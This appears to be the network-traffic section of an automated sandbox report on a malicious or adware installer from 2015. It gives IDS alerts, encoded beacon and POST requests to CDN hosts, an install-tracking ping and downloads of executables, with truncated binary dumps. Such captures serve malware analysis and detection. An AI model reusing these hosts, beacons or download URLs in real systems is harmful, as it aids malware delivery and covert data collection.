hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=Qoli4LW15gtmS6nlSU/NTiWcJxQhCNYt/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT8IWTdc0BVRzshiWv5Ja8Fbs IILilpWF2W4ZI0w3yOP6AmNqIc/gweVlbgaese6RhKA1//X/jiUoeaRpMgDk3ufIzQ IK/nbD0C88izLTrg/fFTbMNbJ5taoe2/agTRYgklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGKotwKW5Oqogj9wXQw f3NHANGpOWwcxYTkg3eP0fa/4=	198.232.124.192
hxxp://1dfgnb-mzxspesu.netdna-ssl.com/14314.ashx?e=WVbe3wHlwMEinMwQKODRlCGn4C mEEfxIM0CqmsRfbtxTYwWxYG9WEEY41XBMtFk/h9mchShIbSrOSgjjO/wQWUl0xzv/1Q131fTgrR12XxM0RSkMVjMOymF904v4t2DZ0d7GEGeHAhiVQeEeICkE1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFmOdeW8Cm Pw=	198.232.124.192

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
ET POLICY Executable served from Amazon S3
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /14314.ashx?e=/TVH52TeC6QinMwQKODRlGRUqvu659HFIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGDDbltvqAzQDxmCcB9WVISvSrmvhzpIGq0JQd5HxgIXe2KZEzW03QC5KGZ7N/WHCaCHzyr AmlG5QSjSVhgDAFHThq7RcDdX0CipiMYwH g4ekVEtTIIfNSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYqi3Apbk6qiCP3BdDD5/c0cA0ak5bBzFhOSDd4/R9r/g== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:51 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:51 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /14314.ashx?e=uWabAt9SLcwPgAd18hbyrmUt3CZAwIBE/Dn8i7qp5mB38psj3UbutFu0ICSu0QOYghmiZJc6KBe9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWP9XPbJELwvM20qHT6WNWM6mY5NIfEeUImHMzOJbNDghLEkZetWvu6sPlKHaI/HhOX8O9MdkgAq0BPEhRyyBD7Az2B3hsM2vVSEmR0fmM6EAe iMFhlMCXZIMYvTWghruEu7UYQsvpwcimSmM1eJuDuHIpRMDfJ5hDuF6IuT3DfqjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:53 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwVAbULHJpnG/5mrFmLJ4RM0tNH56RfInM z4gguKWlYXfSnAquWIhOHxfjsn07DILhkm3E/dlMY S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:53 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=QHucCbLl /arv6GrtwjWz3Ryfx22RDGQfNujG4MuC7j UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwUjBc8MQwUMZYYsZ7QYFDFnxHXZjfhFnaKOBvq/txek 98kq5tFPGRg8hLIAT6TbharyaFrt1ZytQQr15Tmip jZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:53 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

GET /12466.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiORMU9nX4kNMjBc8MQwUMZZmrFmLJ4RM0tNH56RfInM z4gguKWlYXeP7nOBaVPXWjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:53 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

GET /p.ashx?e=b1dRW7RxYKcVc8R/SQUwTCKczBAo4NGUZFSq 7rn0cUUMN9W/ 8fb24W0T1hU8VMkYIKgNqWBwS9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWP9XPbJELwvM4ER/zOphe9XjDyrjfLHdhwq6l7mVDuU2U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOT021585MfhStCC/vmINmoCk0XByrlXk6Xa2GUTuqDbKtCUHeR8YCF3Kke2ijo/txBIBrCYEM0Ntm0iRlndgoD0 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:25:50 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: _-jVsp-RPqhIQOYRiAalyn1cpdVQ00_pIt3HRQj4BN8-RuhJjKVHaQ==

....

GET /p.ashx?e=I6hFHi0H7G9mS6nlSU/NTuiRTIWym4 0QVpVqTl5/e5zgOiYPM 1xJkMnbu79FzppzYLgoZ4xWMc5pB8b49iEV3IK/IMAo6EcW/Ds9zcpL4bkGQrvUopTfauHCM4PoUS28zA03xwxN7DRdbCExQ3XkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mdulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hTfh8cjilZ M3GKWlWmZ3GY= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:25:51 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: C87qPcvXASVAYX3gxUBieuzAATP7FqRH-qwkYRi36v_ra2vMe98Usw==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Thu, 10 Sep 2015 07:25:51 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 15191055e43ba835d0fead01ae8401
5c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: C87qPcvXASVAYX3gxUBieuzAA
TP7FqRH-qwkYRi36v_ra2vMe98Usw==..

GET /app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=&rnd=&v=1.0.11487.1216&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: VVV.ytdownloader.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 0

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:25:49 GMT

HTTP/1.1 200 OK..Cache-Control: private..Content-Length: 0..Server: Mi
crosoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..D
ate: Thu, 10 Sep 2015 07:25:49 GMT..

GET /p.ashx?e=hWfaA75NtHH85nz5m58wW3Ryfx22RDGQQn7xBp tRz8r4Spdf2ZexFyzOKLYTqXCsGG6qLQR8LceI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcQ01xTGsf88 UxX212nyBDCa/en1gDcOKJEEbwQeHz5MQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiZ26V9rLf5AefUXC4FfWEqIYCpHZc9ZUaF7EORqfQiLE44G r 3F6T7f9F3I6C91SWT/e9lpr/riA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:25:41 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: CxYQHkqjMaJ7zyl9dwBLRkJryFnTIRBtcXz5IiKcA90n0nfhvlE6oA==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Thu, 10 Sep 2015 07:25:41 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 15191055e43ba835d0fead01ae8401
5c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: CxYQHkqjMaJ7zyl9dwBLRkJry
FnTIRBtcXz5IiKcA90n0nfhvlE6oA==......

GET /p.ashx?e=aQQpsP6/AW3kex8By7Tt8zRFyso9cgVYusz/yP3Ks9EegceCn LKWe/lQO2eO0N8r J80GV4qARlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJQzpy6nz8DG6TnR9dT7ayg3fHrFM BTebXDbzJkSidOU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOT021585MfhSpFgjcTf6rNyqUVvKp9Lg9XHvdM54V2LCI4G r 3F6T7NPnGVVVl/P0B6w5tb RMu8qEoEbTUKVP HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:25:41 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: IqTBvUrNaIHnrdYGzsyMY-HM6vkhOQkotn97uw3khH2c9DOrAWQ-hg==

POST /br.ashx?pid={PID}&aid={AID}&bur=1&ss=0&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&md5=c9201ba296c08848dfd3d5e86b7c34eb&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=8AD3F1FB-4DE5-44BF-9F6B-81BABBE96DC1 HTTP/1.0

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: d23ocewf5ttxmu.cloudfront.net

Content-Length: 2326

Connection: Keep-Alive

Pragma: no-cache

d=noFdkUddx2Ym7UPApfAaZEVm2P NUcLjYAQ4rsxYlBNPUjW0PyWC z8qaWAtZCrC Lk0d9NV/LXL8gpw81FPFTkpuoGloLadURaiFAYMXj9TIZLWOQ56ZIKHXLr1Ggkc4SggPfc/tFcn3RxyzL60O2gJLpT1SeQuEqKtswrM0VrPdHlXp7UiA4zOL2q4Fkfw8z43pdMpkxN/CIW5/mcnnqjNppTBnFw 6sxpdMC7yXDb9t lw FT5g2kPinz RVopKhL43FjyOXK4Do62Wm I5D52bKRA M13nMDs26fBDaJztU47YAZTQKCtzgk NcN39/Gotw1JC4mG EL81gDxjL6Xi7zM8x7rzCrSs9w96HhShFl lsntOW7bo34Mw90rO2B49rVJgThpkPlg1HLrrxIdHaOiO g/MhXnfLUwPdBatNeMImDmaHENSW2gXy4I4q/XtQXqZHIeZrHGUpqQagX4AwSpxPq1xH6jcD3ATOUccztVAi5CChaMLOUZIlyfJaZVe9Pd36Pns8Ndl2AfjW4xDjn4iJN9NzDyhqAuhg1g3g9TrkcAwkxItUGigkOPx1e qPinMe13xrXBvmKMbLKFYILdkcokBWNZi4qZAhnfwgfDvIWLn6FjeoY5CAT7OoPCwQ5bA5nvYbfIetCoF0EK7qHCSVe5VzAWK0z8BJ7RG4IB96TVO0vqxdgqhxScr1ieLuYl70qam6q6ZG1r51TAEPCW5 ePmahp35X1feIPGdeGe5Ht2TbVi1uBevberBNJDGQyGKexp4a9nEX/39/YUozL/OM3rR7jtQjqEtPlg8Z66SiZ6h8Y5EBWt3U7RQ/p/K6obKOx/WQ7J6JImLOo4YX1gsYI7GdmuKlDxnu1hzcmlA66ErzoOIYN/lU4ROu9iTGt6jt9dmK8ZXFNDV9PszgHQJ0tCUtAVUDNLCi6LakrhREPRsGWKuyBHivbBjJ7TtRWNkz4cUa7h9kUtrFmJh2Sih8uqwSMjKabStVLC88BFJetXR2lD9/IPoqFF0CdRj7iCgy2jhROFW5fFStvoSP7uN3fchauycQ7KKN5Le
HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private,no-cache, no-store

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:27:23 GMT

X-Cache: Miss from cloudfront

Via: 1.1 ad1289c08e15a848e5c2bc019529785a.cloudfront.net (CloudFront)

X-Amz-Cf-Id: VnmrBMeLjfsIhbDlYawLTgarkgrabHuQCcU-9nWq_SWd7_EmB7DG9Q==

GET /wu.ashx?dsid=1&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,&v=2.3.12.1634&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1&ubrand=sc HTTP/1.0

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: pwvz71qp-ur1xo6pn.netdna-ssl.com

Pragma: no-cache


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:53 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 2116

Connection: close

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

nsdNk3N9fwki7WO0x/PmV059ZA8m9otC1FCGA/Cj/r3W3CMpsxneR914EjR10FRfrH5gQQ
R JrjrIHSztX1P2K5/r4jJMDmQgNzoyUXTe9SHqPgtpm8fS2EkkS4iefErsX1aCGk0zwLZ
fmns5M1XlJ8H63G9M/heHNcjnMr9gZJTP7tftKsoSAnml4MtSD7A7tORlwKzpkaC2Aljdj
dZUK9kAIfnRcMO86sLXOLqLo0ZHNvSvEwcQsuzMcvBqGUQRVQgM2UyyimfNPtdxZxq6F5x
RAy1mNufH7VllG1vbD0SEWKASIPL9s0hNleME8bUQHjkEaFv5xCOTYyWyvGrcAj7gYM8Pn
mflwnilWn1G7N5XRApqt5aJkP JTO0kLsZz5ZCD6Y3Fw23zOpLZNLVVts7c4QeMc/ZpT0U
964NK6KkZRNY3RgxIlJj831twDpDQKazVxTAlVka7tVfg WoDGvY SATLLPoyjfU LDziL
J KoNU2gBwiRJM1IIYTfPJFaXQIN6xs/M5ZDpu1B 9LWHGEK9FTnQ oUsjYzQ4zO6WB/Dj
0xTRe3lgS2xYnXI0YcEhRRZ7yGbjXmEYN2kOAncoUS9XBKuXzePzW1se2c4xklKexBcDvx
JjcEbcFGrfc/ODf6gAk3xpCBBXMPnCRTbxFNr6pcg/G1c7ztUvSqP dDywxCk24ri3JLej
RGkhgf1B9zPtlw3xpvXduGXgoBYvNvXDbd9TXe 0zp9KV3yDw0QUPF18yRbALRIlwGIMN/
Nb6ZjbX4KVlj1AX7TmOgkiu1l O3VpbVx7F7VPLWuuuaeWax8wXrFGF8xDzxgTLoGK3 x/
TxvxmKWbP7ELbGTsS e/M6LjHPODzP1u9BBZBvr7Ucp /yoXWopBZ1KYZwdrmKJJgAJWI3
hYUL6 3fRsmVN3SHIyuHQSXmNjeNAd yfFLsPEg TIRrPdCKs85WdvFfSjBDO5HEsyoD43
TPcbEGl68O7jPJl UoDDvBzuUS3MSfjucC4/u65bwx/aNd KIFyq2b6ap9r3wTm9cIT4sT
dhIokbwJXkDr1ao//KCiRJFNx6KFYaC9JTToKK1PyrmIqjTRm75s0MmjAJMnOr5wTBX1Tf
Fk7NN/1li Z0hdi5qbpxJ4wAZgyK/Qm/YBdlP2hlvZFiz9jpHJsF3pGm9ZRiCGCEEtNVpE
ILSp0vLCiWxg9Xj7yst5YUynU8YjtnBZf2x2Q3X7i1Kr9UUhuPOrAGRAU1PPKK1o3hOm0e
KKtzZP0p5ogp1b3ZDzOvsZK3iIQmgsMhmQ98HTHm6/AvxQfIycnCRKoqVtUyKZhjgjZGcT
Dmav3T6HHKRfGQYaricn2Cz2s7XkomCtnO4xBok093z38sbT2rXiuBvBUpOt87Duen6wVM
C5yhX2U2nHvpxHQku0j73SxLnREPQZMfjtk0Mi1FzIHqQ4FPHDNkRPrUfeAbSThSq4pDdC
zAhFpqQdmChSrsUPjLZS3CzVP7/9SfLpp7m4bjUnnulEmL92V8JJJI4MxaoTYtclrf

<<< skipped >>>

GET /bxsdk32.dll HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dyd9qf154h76q.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 942080

Connection: keep-alive

Date: Mon, 17 Aug 2015 04:34:01 GMT

Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT

ETag: "05c47da12b0009bd98653f51287f7768"

Accept-Ranges: bytes

Server: AmazonS3

Age: 8078

X-Cache: Hit from cloudfront

Via: 1.1 1fcd1033bfe42d3b0b03eb4bfbf9624a.cloudfront.net (CloudFront)

X-Amz-Cf-Id: ijjcwct3kqK2knKU-KTKffnR7QRUWQ--8MJp4G4SCde9iMkFcB_8Jw==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......gu..#...#...
#.......!...........#...........I......."......."......."...Rich#.....
......................PE..L...9.dT...........!................P.......
.................................`....................................
..............................................tn..@...................
................................8............................text...O.
.......................... ..`.rdata...t..........................@..@
.data...x.... ....... [email protected].........................
......@[email protected][email protected]....................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Tue, 28 Jul 2015 22:15:32 GMT

Content-Range: bytes 0-249999/520704

Age: 2540

X-Cache: Hit from cloudfront

Via: 1.1 e13dc20cb35881b25fb296fb0383f55c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 1PX3I5rgiKe3PsQbbZmF8MzwSrH8iNhGE5ztCJCaEAH2nzz0EwMLtw==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......]O..........
......*......|2......|..K....|.......V~.............dW..-....|6.......
z.....dW3.....Rich....................PE..L......U....................
......................@..........................@............@.......
...........................>..................................tY...
...................................@..................................
..........text...E........................... ..`.rdata...............
...............@[email protected]....[...`[email protected]......
..........|..............@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................h`.E..uW..Y.V...F.V.^..
.YPV..wG... ..hk.E..PW..Y^.V...F.V.8...YPV..vG... ..hz.E..*W..Y^.V...F
.V.....YPV..vG..\ ..h..E...W..Y^.V...F.V.....YPV..vG..6 ..h..E...V..Y^
.V...F.V.....YPV..vG... ..h..E...V..Y^.V...F.V.....YPV..vG......h..E..
.V..Y^.V...F.V.z...YPV.PvG......h..E..lV..Y^.h..F....G......h..E..PV..
Y.h..F....G......h..E..5V..Y.V.(.F.V.....YPV.hvG..h...h..E...V..Y^.V.8
.F.V.....YPV..vG..B...h..E...U..Y^.h&.E...U..Y.h..E...U..Y.h..E...U..Y
[email protected]^.V...F.V.|...YPV

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=500000-520703

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 20704

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Tue, 28 Jul 2015 22:15:32 GMT

Content-Range: bytes 500000-520703/520704

Age: 2540

X-Cache: Hit from cloudfront

Via: 1.1 e13dc20cb35881b25fb296fb0383f55c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: nJY9Xf3c33ndIQmbIFupbzVsGbKyM6x38lyLwu57NdJ0DjmgKw3OLQ==
....`...1090.0.1y1.1.1.1.1.1.2R2.5.5j6p6.6.6.7.7.7.8.8.9.9.:.:2:.:.:.;
.;.<.<.<f>.>.>.>V?y?.?.?......d...O0.0.0.1.1S1.2.
2.2.2.2.3.3.4.4.4.6.6.7 7.7.7.7!8|8.9.989D9.92:.:.:.:.;.;.;0<?<[
<j<.= =.=s>}>....(...!101>1.1.1.5.5.5N9]9k9.9.9R=a=o=..
.......0.1.1.2;2H2\2.2.4P4v4.4.5i6.6.6.6.6.6.7.7 7W7d7x7.7.7.7.7.7.848
L8R8.8.8.8.8.959.9.9.: :l:.:.:.:.;X;.;.;.;I<.<.<.<.=.=.=.=
.=.>;>P>h>y>.>. .......010.0.0.0.1W1\1t1.1.1.1.1.222
N2S2_2d2|2.2.2.2.2.2.2.3*3:3P3x3.3.3.3.3.3.3.3.4.4!4-424>4C4O4T4r4.
4.4n5.6.6.6.6'777.9.9.9.9P:Y:b:q:.:a<.<.<.=.=.>.>...0..
.....1)1c1|1.1.1.2.2a2.2.2.2.2'3^3.3.304j4.4.4.4.5.5.5a6.6.7.7*787.9.9
.9n:~:.:.:.:.:.:.:.;T;.;.<%<9<M<a<u<.<.<.<.
<.<.<.=.=)===Q=e=.=.>o>.?|[email protected]%0
-040<0D0j0}0.0.0.0.0.0.0.0.0.1.1u1.2.2.2.2.2)2o2.2.2.2.2.2.3.3!3*32
3:3}3.3.3.3.3.3.4.4.4D5T5.5.5.5.5.5.5.5.5.5,6E6V6.6.6.667G7.7.8X8`8u8.
8.8.8.9j9.9.9.9.9.:W:l:y:.:.:.:';<;I;V;.;.;.;.;.<&<3<@<
v<.<.<.<.<.<.<.<.=.=W=s=.>->.>.?.P...
....0.1.1.1.1.1.2(2;2.2.2.2.2.2.2.2.2.3.3$3 333;3a3t3.3.4.4L4R4W4`4h4p
4.4.4.4.4.4.4.4.5*50555>5F5P5.5.5.6.6.6'6/6O6.6.6.6.6.6.6.6.7&727e7
t7.7.7.7.7.7.7.8.8.8.8.8.8.9.9n9.9?:U:.:.:@;V;.<.="=p=.=.=.=.=.>
.>J>V>.>.>.? ?Y?z?.?.?.?...`..|...70P0.0.0.1.1H1.1.1)2K
2l2.2.2.3.3J3_3.3.3.3$4-4.4.4.4.555]5m5.5.5.5.6.6.6.6.7.8.8.9j:y:.:.;.
;.<.<.<.<.<s=.=.=q>.>.?...p.......1.2w2.2.2.2<<< skipped >>>

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWKnmGGYVS7/B0JQd5HxgIXfmCWsTLnvD bTtF4P/Nzf47au 4j4gnPlTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJEKkB5GbhZH HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWFDwWd9hvLDxFAL52sIXt4XaiLHqwXs5rj3ZLnbsoZ9zX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:38 GMT

